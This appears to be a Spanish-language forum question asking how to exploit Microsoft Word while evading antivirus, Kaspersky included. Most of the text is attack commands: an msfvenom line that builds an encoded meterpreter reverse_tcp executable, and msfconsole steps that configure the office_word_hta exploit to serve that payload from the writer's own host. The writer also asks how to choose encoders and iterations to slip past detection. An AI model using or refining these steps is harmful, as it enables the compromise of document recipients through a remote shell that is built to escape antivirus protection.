Estoy intentando explotar MS Word, evitando la detección de AV. Entonces, ¿qué tengo que hacer?
Primero, generar la carga útil, por ejemplo:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe
1. ¿Qué formato de archivo debe ser? ¿exe? Si configuro "-f exe", todavía tengo que configurar el nombre "payload.exe" en lugar de "payload"?
2. ¿Cómo elegir qué codificadores usar y qué iteraciones para evitar las detecciones de AV Kaspersky, por ejemplo? Solo intente de uno a otro o qué?
Luego voy a msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set lhost srvhost 172.20.10.4
msf exploit(office_word_hta) > set srvhost 172.20.10.4
msf exploit(office_word_hta) > set payload generic/custom right?
then set payloadfile pointing to ~/payload.exe?
msf exploit(office_word_hta) > exploit
¿Lo estoy haciendo bien?)